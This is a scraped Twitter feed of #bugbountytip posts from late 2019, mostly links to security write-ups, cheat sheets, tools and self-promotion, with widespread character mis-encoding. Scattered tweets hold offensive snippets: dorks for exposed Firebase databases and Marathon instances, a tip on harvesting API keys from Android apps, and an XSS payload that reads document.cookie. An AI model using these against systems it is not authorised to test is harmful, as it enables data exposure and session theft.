0 firebase database Itโ€™s one of the easier win for #BugBoundy you can easily look for it on google using Site:.firebaseio.com/.json but google doesnโ€™t give you results but if use bing you can get results Google knows the problem #togetherwehitharder #BugBounty #bugbountytip https://t.co/fMSc8J6lM1
Rafin Rahman Chy
@rafinrahmanchy


2019-12-08 15:01:12
11 The best guideline to become an Ethical Hacker I've ever read https://t.co/BMrOc4hH51 #CyberSecurity #InfoSec #infosecjobs #InfoSecurity #ITSecurity #EthicalHacking #EthicalHacker #Hacking #Hacker #Hackers #WhiteHat #BugBounty #bugbountytip #bugbountytips #Pentesting #Pentester
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-08 10:21:34
0 Ginp - A malware patchwork borrowing from Anubis Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting https://t.co/AzgReUIeLf
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-08 10:15:48
0 Breaking Mimblewimbleโ€™s Privacy Model Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/5gDbIPnmFH
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-08 10:07:55
2 Free Giveaway -- Free Programming Ebooks Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/7kp48r2kcA
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-08 10:00:40
3 Introducing Flan Scan: Cloudflareโ€™s Lightweight Network Vulnerability Scanner -- Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 https://t.co/OSiQlEhTHi #BugBounty #BugBountyTip #bugbountytips
Terminal Jockey
@TerminalJockey


2019-12-08 04:03:53
1 I wrote a tool to help me learn bash! Simple script to do a little dns enum then crawls results for dirs found in the robots.txt file. Will be adding functionality, open to critique! https://t.co/PmlCbFedDE #bugbounty #infosec #ctf #bugbountytips #bugbountytip
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-12-07 23:54:02
2 i have finished building my github repository which talk about #OSINT.a very important repository for ethical hackers and and #BugBounty hunters and of course #OSINT lovers the repository for now contain 100 tips and it will get daily updates https://t.co/gNMSDGULS6 #bugbountytip
Samet ลžAHฤฐN
@sametsahinnet


2019-12-07 18:14:21
2 Here is a blog and trick about : "Javascript File Inclusion via a Simple Link Injection" #bugbountytip : Even a Simple Link Injection can be very harmful. Depends on where it is. https://t.co/TcOpslYuvE https://t.co/ks5NJDD3ss
Zero Xyele
@zeroxyele


2019-12-07 12:28:31
0 I Got URLs https://t.co/K5qmVWfEs0 #hackerone #hacker101 #bugbounty #bugbountytips #bugbountytip #bugcrowd https://t.co/X7J2nk2dyz
xaeroborg
@xaeroborg


2019-12-07 12:09:05
0 resource #bugbountytips #bugbountytip https://t.co/kSxeWPYqWe
Hendrik
@hendrikvb


2019-12-07 07:11:49
0 #bugbountytip Add #corsy to your #CSRF recon, complement with #bolt, both by @s0md3v. #bugbounty #Pentesting
ghostlulz
@ghostlulz1337


2019-12-07 01:52:08
1 Most hunters freeze up when they get a piece of source code to analyze. Source code analysis can help you find a lot of bugs which are missed by black box style testing. Don't miss easy XSS. More info in my blog: https://t.co/Ke274Lvc9e #BugBounty #bugbountytips #bugbountytip https://t.co/E1XFw9H9Nc
ghostlulz
@ghostlulz1337


2019-12-06 20:40:05
10 If you're looking to make money bug bounty hunting you may want to get a copy of my book. Nothing is better than getting paid to do what you love! https://t.co/Z1FwTfiskG #BugBounty #bugbountytips #bugbountytip #infosec #appsec #osint #xss #pentest #redteam #cybersecurity https://t.co/CSTWdrUaD2
CyberTheReapeRโ˜ข
@CyberTheReapeR5


2019-12-06 20:39:18
1 what is xss payload for akamai waf bypass?? #hackerone #bugcrowd #infosec #bugbountytips #bugbountytip #xss #hacking
dos_kid
@kid_dos


2019-12-06 18:12:15
0 #bugbountytip Look twice before submitting reports especially for Information disclosures ๐Ÿ˜“
bugbountytip
@a_l_e_r_t_1_


2019-12-06 09:12:09
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby https://t.co/amLbKREucw
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-06 06:03:58
6 Type of Cyber Attacks ๐Ÿฆž Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/MZpyBpq6C4
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-12-06 03:06:03
6 -Windows Notes + Cheatsheet.pdf: https://t.co/lVxi7uImty -Windows Privilege Escalation Fundamentals.pdf: https://t.co/raueoqhVVH -Linux Notes + Cheatsheet.pdf: https://t.co/rrdCBWkbOT -Docker for Pentesters.pdf: https://t.co/Wl6qXHe6XI #bugbountytip #redteam #PenTest #Hacking
bayani elogada
@metamudkip


2019-12-06 02:14:16
0 If you're discouraged from joining unrewarding bug bounty programs, listen to @JessieJ: "We're paying with love tonight." #bugbounty #bugbountytip
fadetoblack
@hardweired


2019-12-05 19:59:55
0 If you're Testing for SSRF or blind XXE and it should takes time to be executed or Invalidated redirections to steal tokens : https://t.co/uHMg4rJD69 This tool is awesome to Test for those kind of bugs #bugbountytips #bugbountytip https://t.co/efC5pv0SZ4
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-12-05 18:43:44
0 Is their anything more beautiful than this in bug bounty #bugbounty #bugbountytip thanks @h1_sp1d3r @hakluke @stokfredrik @Rhynorater https://t.co/z6iavoWzgc
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-12-05 16:25:09
1 #bugbountytip Detect Unix Command injectio Payloads: https://t.co/Jz35dKi8KS Detect in response: regexp for burp suite. https://t.co/J0bS7ViC9C And 30 secod delay. It is all.
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-05 14:17:45
0 OnePlus #Breached Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/VVsLLbfvum
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-05 14:14:39
1 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/yJGb5KrEnU
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-05 14:14:21
0 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/mzFcIOkL8E
Rafin Rahman Chy
@rafinrahmanchy


2019-12-05 13:24:00
1 Facebook Bug Bounty Blogs/WriteUps : https://t.co/CKdsEXouCz https://t.co/rzoYk67VS6 https://t.co/xeQiLCoQbM https://t.co/7y70R706W1 https://t.co/E96wwBPfc6 https://t.co/hfAsZqb9tI https://t.co/ZxPANapI5l https://t.co/SJGiC0xChE https://t.co/d57e8Seq9m #BugBounty #bugbountytip https://t.co/L02NnprDQB
Anas Mahmood ๐Ÿ‡ต๐Ÿ‡ฐ
@AnasIsHere


2019-12-05 12:28:29
6 #XSS like a Pro ๐Ÿ˜Ž Just published another interesting writeup. Must read the full blog post Writeup: https://t.co/HlXk9esUv3 #BugBounty #BugBountyTip #Hacking #vulnerability
TvM
@tvmpt


2019-12-05 12:12:22
0 Quick and dirty way to import a big url list into burpsuite cat file | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s #quickanddirtytip #bugbountytip #oneliner #bugbountytips
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-05 09:14:20
7 Cross Site Scripting Basics - #XSS https://t.co/0wdvBhdOHw Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-05 09:06:33
0 >> kali-undercover To Start #UNDERCOVER Mode in Kali 2019.4 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/F5IhdmmCzF
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-05 09:04:28
0 Update Your Kali and Get the Kali Undercover mode that looks like Windows OS ! Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops https://t.co/o7JrVLrhGx
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-05 09:01:35
0 PyXie Rat - Python Rat to Escalate Windows Permissions Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/eFwqj2ozDj
bugbountytip
@a_l_e_r_t_1_


2019-12-05 08:29:09
0 6 download for 50 + . GOOD HACKING !!! #bugbountytips #bugbountytip
Ajay Gautam
@evilboyajay


2019-12-05 07:06:04
4 I discovered a new kind of web application authentication bypass by accident while doing pentest and thought of sharing with you all <3 #infosecmatters #ethicalhacking #informationsecurity #cybersecurity #infosec #bugbountytip https://t.co/cFnTkaEFG2
ph0rensic
@ph0rensic


2019-12-05 01:15:20
0 I received $ 900 in a private program Hackerone! There is still time to hit the goal! I needed some arguments with the evaluator, always research what you're debating! https://t.co/TDQWkEfNMq #BugBounty #bugbountytip
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-12-05 00:30:46
0 #bugbountytip 99.99% of xss on public programs is dumpicates I got it
robre
@_robre


2019-12-04 21:06:25
1 @NathOnSecurity Hey little tip: open two windows of acunetix, double your income. #bugbountytip
@cr33pb0y
@theyiyibest


2019-12-04 20:05:09
0 Yay, I was awarded a 4 x $X00 bounty on @Hacker0x01! https://t.co/7vrkzfnbNA #TogetherWeHitHarder Recipe to this one: - Google Dorks - XSS reflected - Repeat first step. #bugbounty #bugbountyprogram #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-04 18:58:36
0 Maximise Bug Bounty Scope - Gather Subdomains using Facebook Certificate Transparency https://t.co/AjSRBqt57p #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone
intigriti
@intigriti


2019-12-04 15:47:09
9 โš ๏ธOpen staging environments can lead to production account takeover โœ”๏ธIf they use a separate DB, but same JWT secret โœ”๏ธIf the username or e-mail address is used as identifier This is an excellent #BugBountyTip, thanks @kapytein! https://t.co/yZkBoDBO1d
Tragger Osbourne
@OsbourneTragger


2019-12-04 15:24:58
0 apps,I realized after reverse engineer,using tool like apktool,I was app to look at the AndroidManifest see all permissions, which often lead to stringxml where I would find content delivery ,login ID & pass,fB tokens,googleapi, #bugbountytips #bugbountytip #togetherwehitharder https://t.co/ZBq3acOAoI
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-12-04 12:19:07
1 #bugbountytip All in one for Bug Bounty Hunters and pentesters https://t.co/lRPVHMHKAo
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-12-04 00:37:38
3 -Pen-testing resources.pdf: https://t.co/eykvQfDT5g -Shellcode: Encrypting traffic.pdf: https://t.co/QMsNonNYPZ -huge list of pentest tookit.pdf: https://t.co/LM0XUQb2AI -Information Gathering with theHarvester.pdf: https://t.co/ZFWOVqotm6 #bugbountytip #Hacking #osint #redteam
Tragger Osbourne
@OsbourneTragger


2019-12-03 22:31:18
0 I just find a bug ๐Ÿœ on android app Using firebase , I use apktool Then I look for AndroidManifest.xml , I found firebase they , I look for address in string.xml , I found firebase database and api keys ๐Ÿ”‘ #bugbountytip #bugbountytips #togetherwehitharder
แด‚
@pouyana1


2019-12-03 21:55:59
3 Of course that James Kettle articles are something else. @albinowax https://t.co/nsTQZFfzMX #bugbountytip #infosecurity #Security #websecurity
haxor_raheem
@HaxorRaheem


2019-12-03 18:31:52
1 Anyone know how to inject a "href" payload in "h1" payload . @Bugcrowd @Hacker0x01 #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-03 18:26:53
9 Exposed Log Files - https://t.co/Kft6p37wJM Exposed Firebase DB - https://t.co/WGzatNLO3C Exposed Github Passwords- https://t.co/sGVY9UloQQ Hacking GraphQL - https://t.co/Z4ZBm3bN82 XSS SVG - https://t.co/5k3dGwkaGA #BugBounty #bugbountytips #bugbountytip #infosec #osint
Sebastian Wieseler
@kickino


2019-12-03 15:30:20
2 Controversial #bugbountytip Schedule meetings with (defence) vendors and learn about their technics and technologies. Engage with them during product demos and establish a deeper understanding of their products. You can also use โ€œblueโ€ knowledge for โ€œredโ€ approaches or #bugbounty
แด‚
@pouyana1


2019-12-03 09:42:57
0 bugbounty tips : find hidden HTTP headers and inject them, simple way to reach high risk bugs. #BugBounty #bugbountytips #bugbountytip
Shaurya Sharma
@ShauryaSharma05


2019-12-03 08:39:35
0 I just finished writing a blog and it's a great read for those who are trying their luck in bug bounty "Havenโ€™t founded any bounties yet? Hunt for these vulnerabilities in web applications for a better bounty!" https://t.co/NRSjy03JN5 #bugbounty #hacking #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-12-03 08:28:35
0 #bugbountytip find open prod marathon instances in shodan. - โ€œX-Marathon-Leaderโ€ - โ€œssl:Redactedโ€ โ€œX-Marathon-Leaderโ€
soon
@soon73564093


2019-12-03 06:32:33
1 Bingo xss <3 #bugbounty #bugbountytip https://t.co/d6FilP9MWs
Shoeb Patel
@0xCaptainFreak


2019-12-03 04:08:04
0 I constantly take time out of App Security and learn something else to keep things interesting. System Design and Competitive programming Interests me a lot. 1. https://t.co/SpMqOJ40sE 2. https://t.co/hhWuOhB85V #bugbountytips #bugbountytip
SerWaf
@serialwaffle


2019-12-03 02:24:57
0 Can someone explain to me how the directories work in #hackerone? If I understand correctly, all of the directories are fair game (if I stick to the in-scope items of course). Can I just pick a Co. and start hunting???#bugbounty #bugbountytip @Hacker0x01
Sanketh Sharath
@sharathsanketh


2019-12-03 02:18:19
2 Web application architecture:Principles, protocols and practices by Shklar & Rosen seems to be a great book! It's doing a world of good to me in making me understand how web apps work. Definitely recommended for those getting into bugbounty #bugbountytips #bugbounty #bugbountytip
sudo ls /usr/local/protected ๐Ÿ”ด
@AbdulConsole


2019-12-02 23:50:45
0 You donโ€™t want to look at the website from a birdโ€™s eye view and find low hanging fruit i.e, security vulnerabilities without any serious impact. #bughunting #bugbountytip #bugbountytips
Avanish Pathak
@avanish46


2019-12-02 18:33:32
0 Short Note On The $3000 XSS Found On the Public Program on @Bugcrowd #bugbountytip #bugbounty https://t.co/Avh1EW66KA https://t.co/Ef7EW6LwSg
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-02 17:07:17
0 Million Users PII Leak Data Leak Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/XOMt0BJnnn
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-02 17:03:30
0 How I could delete Facebook Ask for Recommendations postโ€™s place objects in comments Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips https://t.co/3jmDgBbzsK
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-02 17:00:08
2 Subdomain Takeover Via Campaignmonitor . Com Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/nmegpRCRSs
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-02 16:58:31
0 Subdomain Takeover Via https://t.co/CYXQhAOtlh https://t.co/nmegpRCRSs Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-02 16:55:23
0 Disable Any Unconfirmed Account in Facebook https://t.co/p2TQTXMYW5 Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-02 16:52:38
0 Prowler: AWS CIS Benchmark Tool https://t.co/TfvuLHUcqN Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt LinkedIn - https://t.co/nhF4SN8Sd5 Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-02 16:48:25
2 Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. https://t.co/ABDslQah52 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #DevOps
Fisher
@Regala_


2019-12-02 16:28:59
2 I did this super tiny extension a while back that you can now find in the BApp Store. Just go to your Site Map -> Select All -> Right click -> Copy sub domains ๐Ÿ™‚ #bugbounty #bugbountytip https://t.co/DiwqY76TUk
ghostlulz
@ghostlulz1337


2019-12-02 15:23:47
0 ITS CYBER MONDAY. If your looking to make a living doing bug bounties you may want to get a copy of my book. I'll show you exactly how I operate. This is the last time i'll post this ๐Ÿ™‚ https://t.co/zJFRZjg5q2 #bugbountytip #bugbountytips #bugbounty #osint #infosec #dfir https://t.co/VZ8FJPVoIO
Dujunayan
@dujunayan


2019-12-02 15:11:29
0 Google it, this's how make shit done <3 #bugbountytip
%00Termi
@Termi1215


2019-12-02 14:26:50
0 Sometimes i just wonder from where @ippsec has got all the knowledge in the world. Oscp , pentesting , bug bounty,red team just watch his videos. @elonmusk of pentesting world. #bugbounty #bugbountytip
ALL ABOUT HACKER
@AboutHacking


2019-12-02 13:21:30
0 How to start Bug Bounty Read -: https://t.co/b9iplwe1i8 #bugbountytip #bugbounty #bugbountytips #cybersecurity https://t.co/tkIgmb7yBH
๐Ÿ‡ณ๐Ÿ‡ฌSam-Olayemi
@cykic_


2019-12-02 06:58:32
1 XSS cheat sheet contains many vectors that can help you bypass WAFs and filters #CyberSecurity #bugbountytip https://t.co/HfYpEaiOZ6
securibee ๐Ÿ
@securibee


2019-12-02 05:26:50
2 Free course "Automate the Boring Stuff with Python Programming" https://t.co/VfpiAK9jgw #bugbountytip #infosec
Sanketh Sharath
@sharathsanketh


2019-12-02 05:03:25
0 I use the community edition of Burp for bug hunting. Its a great tool, but I am really glad I am investing time learning how to use Zap too. This way I could leverage the features I am missing out on the Burp Pro edition. #bugbounty #bugbountytips #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-01 22:10:28
6 If you are looking to make ๐Ÿค‘money๐Ÿค‘ as a pentester or bug bounty hunter you will want to get a copy of my book. WARNING INDUSTRY SECRETS WILL BE DROPPED!๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/zJFRZjg5q2 #bugbountytip #bugbountytips #bugbounty #infosec #redteam #osint #dfir #pentest https://t.co/gmUrqA1tW7
soon
@soon73564093


2019-12-01 18:20:31
3 Xss Go: https://t.co/hIsozDABTH Paste payload: "><script>alert(document.domain)</script> or "><script>alert(document.cookie)</script> @EBHORSMAN #bugbounty #bugbountytip https://t.co/kOp6LxATOV
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-01 18:09:43
1 Subscribe to Our Telegram Channel and Never miss an update on Zero day and New Bug Bounty Tips and Tricks https://t.co/pfl0JWOIqo Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #pentest
Brijesh Shah
@Brijesh1997


2019-12-01 16:44:37
0 URGENT: Best wordlists for fuzzing subdomains required. Found subdomain/assets/6193029F7C344C93BC50CBDBDC9AC91E.xls Need to find what else is exposed publicly. #bugbounty #bugbountytip #bugbountytips
lordsaibat
@lordsaibat


2019-12-01 13:58:37
1 @RealTryHackMe This is a great start into hacking and bug bounties if you are looking. All the rooms give you clear targets to hunt for. #bugbountytip #Hacking #infosec
Brute Logic
@brutelogic


2019-12-01 13:33:23
3 Old #bugbountytip from 5 years ago! https://t.co/7I6aZ5Fo6v
ninetynine
@ninetyn1ne_


2019-12-01 09:49:33
1 Quick tip - If Cross Origin Request allowed only from https://*.target.com, then try finding an XSS on any subdomain of the target, even if they are out of scope, and initiate a CORS request using that XSS. ๐Ÿค˜๐Ÿค˜ #bugbountytip #BugBounty
David Dale
@meathacker


2019-12-01 04:01:02
0 Hearing about IDORs? Not sure what they are? https://t.co/3MEbfcCL4j Great resource! #bugbountytip @Bugcrowd @samhouston
Armin Gojak
@fyoozr


2019-11-30 22:52:18
0 Nice step-by-step walkthrough for finding XSS by @brutelogic https://t.co/A7PsjSLSQQ #bugbounty #bugbountytip
Laszlo Kokai
@kokail


2019-11-30 20:43:11
0 RT @rez0__: Finally took the time to do a write up! Wrote up my first RCE (was also my first critical at that time): https://t.co/76981mCgLk #bugbountytips #bugbountytip Thereโ€™s some shout-outs in this post to: @healthyoutlet @Michael1026H1 @NahamSec @stokfredrik @TomNomNom
Leonishan
@leonishan_


2019-11-30 19:32:04
3 Exploiting XSS with 20 characters limitation #XSS #bypass #bugbountytip #bugbounty https://t.co/k51H9OkNso
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-11-30 18:03:10
12 -1-Multiple Ways to Get root through Writable File.pdf: https://t.co/442zfZCBtm -2-CTF Series : Vulnerable Machines.pdf: https://t.co/DJMEurYB0d -3-Red Team Tips.pdf: https://t.co/NAJAIeEsK7 #bugbountytip #redteam #PenTest #Hacking #ctf #cybersecurity #infosec #BugBounty #OSINT
Sebastian Wieseler
@kickino


2019-11-30 05:16:25
1 Btw, my slides from my @div0_sg talk about XSS vulnerabilities are here: https://t.co/X968arapPd Enjoy ๐Ÿ™‚ #bugbountytip #bugbountytools #bugbounty #togetherwehitharder
๐š› ๐šŽ ๐šฃ ๐Ÿถ
@rez0__


2019-11-30 03:14:29
1 Finally took the time to do a write up! Wrote up my first RCE (was also my first critical at that time): https://t.co/37N78DLalr #bugbountytips #bugbountytip Thereโ€™s some shout-outs in this post to: @healthyoutlet @Michael1026H1 @NahamSec @stokfredrik @TomNomNom
Brijesh Shah
@Brijesh1997


2019-11-29 19:08:04
2 dig A <subdomain> is returning <subdomain> 60 IN SOA https://t.co/SBKgEiAHvQ. https://t.co/UerpKCDxNL 1 7200 900 120960060 Can i takover this subdomain? #bugbounty #bugbountytip #bugbountytips
ALL ABOUT HACKER
@AboutHacking


2019-11-29 18:54:34
0 Cross Site Scripting attack Basic to advance [ part 7]- Basic Burp suite Read:https://t.co/GRACpUbkBi #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/YF94iI795N
Hussein Daher
@HusseiN98D


2019-11-29 18:40:48
0 This was a really hard time for me, I'm back now. Thanks to everyone for your support and all the messages I got. A #bugbountytip will follow soon. Take care
ghostlulz
@ghostlulz1337


2019-11-29 12:55:16
0 Today is BLACK FRIDAY! If you are trying to make a living doing bug bounties you may want to get a copy of my latest book. I show you exactly how I hunt from start to finish. https://t.co/zJFRZjg5q2 #BugBounty #bugbountytips #bugbountytip #BlackFriday2019 #osint #dfir #infosec https://t.co/d1zC3PS0XR
intigriti
@intigriti


2019-11-29 12:38:38
3 ๐Ÿ›๏ธIt's also #BlackFriday in #BugBounty land ๐Ÿ›’! Harvest all the coupon codes, try this #BugBountyTip by @quintenvi and score some bounties! ๐Ÿ’ฐ https://t.co/mZnQGkOnF3
Arif Khan
@payloadartist


2019-11-29 06:56:15
0 Nice step-by-step walkthrough for finding XSS by @brutelogic https://t.co/d998DJHlHm #bugbounty #bugbountytip
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-11-28 23:28:18
7 -Top 40 Best Linux Commands Cheat Sheet. Get It Free Now.pdf: https://t.co/2iKmWinQuN -Complete Google Dorks List in 2019 For Ethical Hacking and Penetration Testing.pdf: https://t.co/hdYVSGNQYs -Blue Team Tips.pdf: https://t.co/lq74aWZo9x #OSINT #bugbountytip #Linux #pentest
bugbountytip
@a_l_e_r_t_1_


2019-11-28 21:05:30
0 Happy Thanksgiving!! Bug bounty tips just 1 $ for 8 hours. Lets go guys. ๐Ÿ˜‚ Lets hacking.. https://t.co/JPaA4CKmfO #bugbountytips #bugbountytip https://t.co/ZEIBuwiUDl
bugbountytip
@a_l_e_r_t_1_


2019-11-28 19:29:47
0 Hi guys. Subscribe my youtube channel for PoC and tutorial videos.. https://t.co/yyqYNBzlhi #Bugbountytips #Bugbountytip
chaitanya
@chaitanya0888


